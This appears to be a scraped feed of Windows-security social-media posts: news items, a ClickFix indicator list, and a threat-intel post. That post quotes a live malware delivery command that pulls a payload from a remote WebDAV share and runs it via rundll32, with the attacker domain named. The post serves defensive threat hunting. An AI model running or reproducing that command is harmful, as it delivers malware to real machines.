7ASecurity⚠️ WMIC is going away.
🖥️ WMI isn't.
🚨 Attackers still abuse native Windows tools for stealthy, fileless persistence.
👉 https://7asecurity.com/blog/2026/06/we-audited-legacy-wmic-commands-our-defensive-guide/
7ASecurity⚠️ WMIC is going away.
🖥️ WMI isn't.
🚨 Attackers still abuse native Windows tools for stealthy, fileless persistence.
👉 https://7asecurity.com/blog/2026/06/we-audited-legacy-wmic-commands-our-defensive-guide/
DIESECWindows Defender zero-day (RoguePlanet) — public PoC on GitHub, SYSTEM on fully patched Win10/11, no patch exists. Any foothold = SYSTEM. Audit app allow-listing now.
Winbuzzerhttps://winbuzzer.com/2026/06/11/microsoft-fixes-windows-server-2025-bitlocker-recovery-bug-xcxwbn/
Microsoft has fixed a Windows Server 2025 BitLocker recovery bug, giving IT admins mitigation paths for affected systems at restart.
#WindowsServer2025 #BitLocker #Microsoft #WindowsServer #WindowsUpdate #MicrosoftWindows #SecurityPatches #MicrosoftSecurity #WindowsSecurity #Encryption #Enterprise
laztname🚨 Suspicious malware delivery command observed:
conhost --headless cmd /v:on /c "call pushd \\ralgob.n1betiran.com@SSL\62b7a48e-c9dc-444f-87f7-32759cd65d16 & rundll32 goog.ct,#1"
The command hides execution, connects to a remote WebDAV share, and launches a payload via rundll32.
Observed infrastructure:
• ralgob.n1betiran.com
• *.n1betiran.com
Observed compromised website:
• ic.sch.id
Worth checking for WebDAV activity (@ssl, PROPFIND) and unusual rundll32 executions.
#Malware #CyberSecurity #ThreatIntel #DFIR #IncidentResponse #BlueTeam #WindowsSecurity #WebDAV #IOC #SOCAnalyst #tech
https://winbuzzer.com/2026/06/07/microsoft-sets-june-kerberos-tests-for-ntlm-shift-xcxwbn/
Microsoft will test Kerberos paths for Windows NTLM fallback in June, giving admins a Canary preview to catch legacy app and device authentication failures.
#WindowsNTLM #Kerberos #Microsoft #MicrosoftWindows #Windows11 #WindowsServer #WindowsInsiderProgram #Cybersecurity #WindowsSecurity
🚨 Ongoing ClickFix Campaign Alert 🚨
Threat actors are using fake browser/app update prompts to trick users into running malicious PowerShell scripts (Win+R → Ctrl+V).
Block & monitor these defanged IoCs:
🔹 amalgama[.]lat
🔹 bearman[.]bond
🔹 burunduktracker[.]xyz
🔹 cosmostars[.]shop
🔹 lenders[.]digital
🔹 megamegalodon[.]click
🔹 merindashop[.]cyou
🔹 mob[.]lanjut[.]in
🔹 moll[.]lanjut[.]in
#ClickFix #ThreatIntel #CyberSecurity #InfoSec #Malware #IOC #DFIR #ThreatHunting #BlueTeam #SOC #CTI #DetectionEngineering #IncidentResponse #OSINT #PowerShell #WindowsSecurity
https://winbuzzer.com/2026/06/02/microsoft-backs-off-threats-against-security-researchers-xcxwbn/
Microsoft has ruled out action against security researchers after a backlash, narrowing legal risk around its wider disclosure dispute.
#SecurityResearch #Microsoft #Security #Cybersecurity #ZeroDay #MicrosoftWindows #WindowsSecurity #WindowsVulnerability #Windows11
https://winbuzzer.com/2026/06/01/github-ban-escalates-microsofts-yellowkey-dispute-xcxwbn/
GitHub appears to have banned the security researcher behind the YellowKey BitLocker exploit reveal, widening Microsoft's fight over public disclosures.
#GitHub #YellowKey #Microsoft #BitLocker #Windows11 #ZeroDay #Exploits #WindowsSecurity #Cybersecurity
halil denizWhat is Silver Ticket Attack: A Comprehensive Guide
In this article, I cover how Silver Ticket attacks work, common exploitation scenarios, detection techniques, and mitigation strategies.
https://denizhalil.com/2026/05/27/silver-ticket-attack-comprehensive-guide/
#CyberSecurity #ActiveDirectory #SilverTicket #Kerberos #CredentialAccess #RedTeam #BlueTeam #Pentesting #WindowsSecurity #InfoSec #ThreatDetection #DenizHalil
